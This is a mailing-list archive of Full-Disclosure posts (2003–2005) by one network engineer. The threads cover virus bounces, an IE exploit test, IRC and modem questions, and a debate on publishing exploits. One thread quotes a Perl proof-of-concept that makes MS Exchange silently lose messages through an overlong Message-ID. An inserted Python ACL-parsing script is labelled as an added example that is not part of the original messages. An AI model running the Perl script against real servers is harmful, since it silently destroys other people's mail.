Virus Found in message "[Full-Disclosure] Virus whether the scanners say so or not?"

2003-09-01 Thread Syed Imran Ali
???


Norton AntiVirus found a virus in an attachment you
([EMAIL PROTECTED]) sent to
[EMAIL PROTECTED]

To ensure the recipient(s) are able to use the files you sent, perform a
virus scan on your computer, clean any infected files, then resend this
attachment.


Attachment:  wupdated.zip
Virus name: Multiple viruses found.  Please see individual log messages.
Action taken:  Clean failed : Quarantine succeeded : 
Sender : [EMAIL PROTECTED]
File status:  Still contains 1 infected items




Scan type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: W32.HLLW.Moega
File:  wupdated.zip>>wupdated.exe
Location:  Mail System
Computer:  mani
User:  mani
Action taken:  Clean failed : Quarantine succeeded : 
Date found: Mon Sep 01 19:21:45 2003

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Computer problem ties up British Airways

2003-09-08 Thread Syed Imran Ali
Guess it happens to the best of them. Any other evidence?



-Original Message-
From: Saeed, Iqbal [mailto:[EMAIL PROTECTED] 
Sent: Monday, September 08, 2003 12:16
Subject: FYI: Computer problem ties up British Airways

 
London
September 8, 2003
  


Hundreds of British Airways passengers around the world were delayed and
transferred to other flights after a two-hour electrical failure at
Heathrow airport shut down the company's global computer network, the
company said. 

The failure on Friday affected the system used for checking in
passengers. The worst hit airport was Heathrow itself, where 11 flights
were cancelled and others delayed by up to two hours before the system
was eventually restored. 

"We have got a team of IT experts investigating the cause of the
problem," a company spokeswoman said. "At this stage we do not know
what happened."

AFP  




RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)

2003-10-10 Thread Syed Imran Ali
Yup that's true, the exploit actually didn't work even if I was logged
in as Administrator or a normal user in Windows XP SP1 with all patches
installed except 811394.

Regards, 
Syed Imran Ali
  
Senior Network Engineer

(T) +92-300-9256202 
  
:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: 
The information contained in this e-mail is confidential and may be
privileged. It is intended for the addressee only. If you have received
this e-mail in error please notify us immediately, then delete this
e-mail. You should not copy it for any purpose, or disclose its contents
to any other person. We cannot accept any responsibility for viruses, so
please scan all attachments. The statements and opinions expressed in
this message are those of the author and do not necessarily reflect
those of the company. The company does not take any responsibility for
the views of the author


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of gregh
Sent: Friday, October 10, 2003 3:07 AM
To: Irwan Hadi
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)

- Original Message - 
From: "Irwan Hadi" <[EMAIL PROTECTED]>
To: "gregh" <[EMAIL PROTECTED]>
Cc: "Stephen" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Thursday, October 09, 2003 3:55 PM
Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)


> On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:
>
> >
> > - Original Message - 
> > From: "Stephen" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Thursday, October 09, 2003 5:19 AM
> > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)
> >
> >
> > >
> > > It becomes really dangerous to use IE ...
> > >
> > > http://www.k-otik.com/WMPLAYER-TEST/
> > >
> > > God bless Mozilla
> > >
> > > http://www.mozilla.org/
> > >
> >
> >
> > Your test didn't work on my IESP1 under XP with all patches excepting
> > 811394. Absolutely no effect on WMP. My original WMP remains and works.
>
> It depends whether you were logging as a privileged user or not.
> If not, then your browser can't delete the wmplayer.exe file, because
> the only user that can change/delete the wmplayer.exe file is privileged
> user.
> C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
> C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
>   BUILTIN\Power Users:C
>   BUILTIN\Administrators:F
>   NT AUTHORITY\SYSTEM:F
>
>
> C:\PROGRA~1\Windows Media Player>
>
> The problem is just too many people are running their Windows with
> Full Privileges.
>


Didn't matter what I logged in as. I normally am ADMIN, naturally but a
privileged user, a very limited user - no difference. The exploit didn't
work.

Greg.
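
The ACL point made in the quoted reply above, as an added example that is not part of any message in this thread: it parses the `cacls` output shown there and reports which principals hold a right that allows changing or deleting the file. The function names are illustrative, and only the simple `cacls` right codes (N, R, W, C, F) are handled.

```python
# Added example: audit which principals in cacls output can modify a file.
# Simple cacls rights: N none, R read, W write, C change (write), F full control.
MODIFY_RIGHTS = {"W", "C", "F"}

# Output quoted in the thread, with prompt lines and quote markers removed.
SAMPLE_PATH = r"C:\PROGRA~1\Windows Media Player\wmplayer.exe"
SAMPLE_OUTPUT = r"""C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
  BUILTIN\Power Users:C
  BUILTIN\Administrators:F
  NT AUTHORITY\SYSTEM:F
"""


def parse_cacls(path, output):
    """Return {principal: right} for one file's cacls listing."""
    acl = {}
    for line in output.splitlines():
        line = line.strip()
        # The first entry shares its line with the file path.
        if line.startswith(path):
            line = line[len(path):].strip()
        if not line:
            continue
        # Principals may contain spaces, so split on the last colon only.
        principal, sep, right = line.rpartition(":")
        if not sep or not principal:
            raise ValueError(f"unrecognised ACL line: {line!r}")
        # Drop inheritance flags such as (OI)(CI) if present.
        acl[principal] = right.split(")")[-1].strip()
    return acl


def writers(acl):
    """Principals whose right lets them change or delete the file."""
    return sorted(p for p, r in acl.items() if r in MODIFY_RIGHTS)


def can_modify(acl, groups):
    """True if any group the user belongs to holds a modifying right."""
    wanted = {g.lower() for g in groups}
    return any(p.lower() in wanted and r in MODIFY_RIGHTS
               for p, r in acl.items())


if __name__ == "__main__":
    acl = parse_cacls(SAMPLE_PATH, SAMPLE_OUTPUT)
    print("can modify:", writers(acl))
    print("limited user:", can_modify(acl, [r"BUILTIN\Users"]))
    print("admin user:", can_modify(acl, [r"BUILTIN\Users",
                                          r"BUILTIN\Administrators"]))
```
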




RE: [Full-Disclosure] IRC DCC Exploit

2003-10-17 Thread Syed Imran Ali
H seems like he wants to d/c other ppl from IRC too ;) 
Bro. Go through the previous posts of this week on F.D. That would
definitely help you to find the answers to your questions.

Regards, 
Syed Imran Ali
  
Senior Network Engineer

Karachi/Pakistan
(T) +92-300-9256202 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Farrukh
Hussain
Sent: Friday, October 17, 2003 3:01 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] IRC DCC Exploit


Hey,
  I want to know about DCC Exploit,

1)  What is Irc DCC Exploit ?
2)  How it works ?
3)  What is its Source/code ?
4)  How to protect from this exploit ?
5)  And in which language people were made ?

  I am asking you about it because it is harmful; when I join a
channel I get disconnected 4 times with Critical Error. So please reply to me
as soon as possible. Thanks.

Best Regards from,
Farrukh Hussain.



RE: [Full-Disclosure] A webserver

2004-02-13 Thread Syed Imran Ali
Hello Puneet,

Ask your cable operator to redirect incoming port 80 requests to your
machine (I am sure he won't do that, cuz he is probably running his own
web server too). In this case configure your web server on any different
port, e.g. "8090", and ask him to map that port to your machine's IP.
Go to www.dynu.com and register http://puneet.dynu.com for free. Now
others can access your server through http://puneet.dynu.com:8090/

Hope u have got the answer.

Regards,

Syed Imran Ali  

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Puneet
Sent: Friday, February 13, 2004 7:27 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] A webserver

Hi...I'm from India.
I am using net from cable connection and my PC is in a LAN.
Can anyone tell me how can I make my computer a webserver or an FTP
server.

Please reply. I need this.



RE: [Full-Disclosure] www.microsoft.com

2003-08-15 Thread Syed Imran Ali
Same here

 



Regards, 
Syed Imran Ali
  

 



 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Kane Lightowler
Sent: Friday, August 15, 2003 10:07 AM
To: '[EMAIL PROTECTED]'
Subject: [Full-Disclosure] www.microsoft.com

 

Looks like www.microsoft.com is dead 
  (110) Connection timed out


 

Regards, 

Kane Lightowler 







CONFIDENTIALITY: This e-mail and any attachments are confidential and may be privileged. If you are not a named recipient,please notify the sender immediately and do not disclose the contents to another person, use it for any purpose or store or copy the information in any medium.  
RE: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how

2004-05-12 Thread Syed Imran Ali
I agree with Randal's point of view.
Dunno abt others...

Although we have been discussing this exploit posting issue since long
time... the latest one was cyber punk's, h ..

4 C.P : h1ya, u rem. WFD ;) sh0utS t0 U agAin. ;)

Regards,

S. Imran Ali

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
Sent: Thursday, May 13, 2004 6:45 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so
lets post how

I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the "exploit" example because, in his
own words, 

<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!

Exactly in what way do you think this should speed up the release? 

Granted, this is a "lost" email exploit. But what if it was a dangerous
exploit? I have seen these also posted.

I know of "script Kiddies" who would never be able to find the exploit but
are part of the group who "know how to use this 'FEATURE'...". They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
Administrator I have no need for the exploit but for the knowledge. I have
found no better place than here for that. Then on the other hand you all
give out the exploits for confirmation which is needed also. Just some of my
personal inward ramblings.

thank you
Randall M
 

<|>--__--__--
<|>
<|>Message: 20
<|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
<|>From: [EMAIL PROTECTED]
<|>To: [EMAIL PROTECTED]
<|>Subject: [Full-Disclosure] MS Exchange message lost
<|>
<|>* MS Exchange duplicate message fault (message lost)
<|>*
<|>* MS Exchange (all versions affected) duplicate message fault
<|>*
<|>* I discovered this bug independently on 10, 2003
<|>*
<|>* public post 05, 2004
<|>*
<|>* Helmut Schmitz < [EMAIL PROTECTED] >
<|>*
<|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */
<|>
<|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
<|>messages with long message ids (>189 bytes?) to more than one recipient
<|>(cc), the message will not be delivered correctly ... there is no correct
<|>logging !!, the messages will be delivered to only one recipient ... the
<|>message to the other will be lost !!
<|>
<|>I have sent this issue to Microsoft (10.2003) ... some months later
<|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
<|>some reg settings fixes (workaround ;-) the problem.
<|>
<|>Perl Example (test exploit) ...
<|>
<|>#!/usr/bin/perl -w
<|>use Net::SMTP;
<|>$from = '[EMAIL PROTECTED]';
<|>$to = '[EMAIL PROTECTED]';
<|>$cc = '[EMAIL PROTECTED]';
<|>$subject = 'Test Email';
<|>$smtp = Net::SMTP->new('yourmailserver');
<|>$smtp->mail($from);
<|>$smtp->to($to);
<|>$smtp->cc($cc);
<|>$smtp->data();
<|>$smtp->datasend("To: <$to>\n");
<|>$smtp->datasend("Cc: <$cc>\n");
<|>$smtp->datasend("From:  <$from>\n");
<|>$smtp->datasend("Subject: $subject\n");
<|>$smtp->datasend("Message-ID:
<|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
<|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
<|>feejktmhedgedherngrondljzhng> \n");
<|>$smtp->datasend("Hallo\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->dataend();
<|>$smtp->quit;
<|>
<|>Background:
<|>Duplicate detection is decided by three factors.  These are MessageID,
<|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
<|>store.  These are used to build a unique key when the message is
<|>submitted.
<|>If all the factors are the same value, then we recognize the message as
<|>duplicate.
<|>
<|>###
<|>
<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!
<|>
<|>Regards,
<|>Helmut Schmitz



RE: [Full-Disclosure] !! Internet Explorer !!

2004-06-12 Thread Syed Imran Ali
Get Pest Patrol...

Regards,
S. Imran Ali

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Farrukh Hussain
Sent: Friday, June 11, 2004 7:35 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] !! Internet Explorer !!


Hey,
   Yesterday I was visiting web sites, and I felt my computer was slow. At
that time I shut down my computer and went somewhere. Today I restarted my
computer, and when I open Internet Explorer I get a web page which I didn't
set. And now I am not able to type www.anydomain.com; when I type it, it gives
me an error. It is also opening popup window advertisements. And it has 2 files
in my Windows directory; when I removed them, they came back again. So please
tell me,
1) What is it?
2) How can I delete/remove it?
3) How did I get this thing?
4) How do I secure against this thing?

here is the 1 page from many pages in internet explorer.
http://www.farukh.com/1.GIF


Best Regards from,
Farrukh Hussain.



[Full-Disclosure] Yahoo upgraded all accounts to 100MB

2004-06-15 Thread Syed Imran Ali
Hiya,

It is nice to see my inbox today, having 100MB of storage space, 84%
remaining. Yahoo now allows up to 10MB attachments too. I am not sure
whether .co.uk is still allowing POP or not with 100MB, as it was with 6MB.

Regards,

S. Imran Ali




RE: [Full-Disclosure] Awake a modem with AT commands

2005-02-25 Thread Syed Imran Ali
Hmmm,
As far as I think you can only awake a dialup modem if u gain access to
the pc. Otherwise to bind a shell on a modem you need to initialize it first
and establish a connection with it.

I don't know if you specifically asked for DSL or Cable modems or what you
exactly wanna do with it.

As far as AT commands are your concerns, I think most of the ppl on the list
can help you out. 

Btw, elucidate ur question please.

Regards,

S. Imran Ali
X-WFD Member
(hay m0r0n if u r 0n the list, contact me. Thnx)


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of action09
Sent: February 21, 2005 6:17 PM
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Awake a modem with AT commands

Hi! 
I'm looking for specially crafted Hayes AT commands to awake a computer
( behind a firewall, connected to an internal LAN , but --also--
connected to an external phone line ) .

The machine is a Windows 2K Pro, someone can help please ?

Is there a way to awake a dialup modem, have a shell on it after ? how ?

Thx in advance for any clue.

sorry for my bad english.

A-Xess





RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands

2005-02-27 Thread Syed Imran Ali
>True, my first modem was 300 baud,
>but if you try to issue an AT command to a DSL or cable modem, I think you
>will not get a response.

True my friend,
I didn't say n e thing about issuing AT commands to DSL or Cable modems. Did
I? As far as I know they do not respond. (and you said that too).
It is good to hear that your first modem was 300. Mine was 1400. So of
course u have been using them longer than me. Did u get the clue about her
question?

Thnx for response n e way.

Regards,

Imran Ali 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Curt Purdy
Sent: February 26, 2005 8:43 AM
To: 'Syed Imran Ali'; 'action09'; full-disclosure@lists.netsys.com
Subject: RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands

Syed Imran Ali wrote:
> I don't know if you specifically asked for DSL or Cable 
> modems or what you exactly wanna do with it.
> 
> As far as AT commands are your concerns, I think most of the 
> ppl on the list can help you out. 
> 
> Btw, elucidate ur question please.

Mr. Ali,

Please be aware that action09 does not need to "elucidate", as you obviously
do not understand what she was saying to start with.  I do not mean to mock
you, but you really need to get a clue.  True, my first modem was 300 baud,
but if you try to issue an AT command to a DSL or cable modem, I think you
will not get a response.

Curt Purdy CISSP, GSEC, CNE, MCSE+I, CCDA 
Information Security Engineer 
DP Solutions 

-

If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke

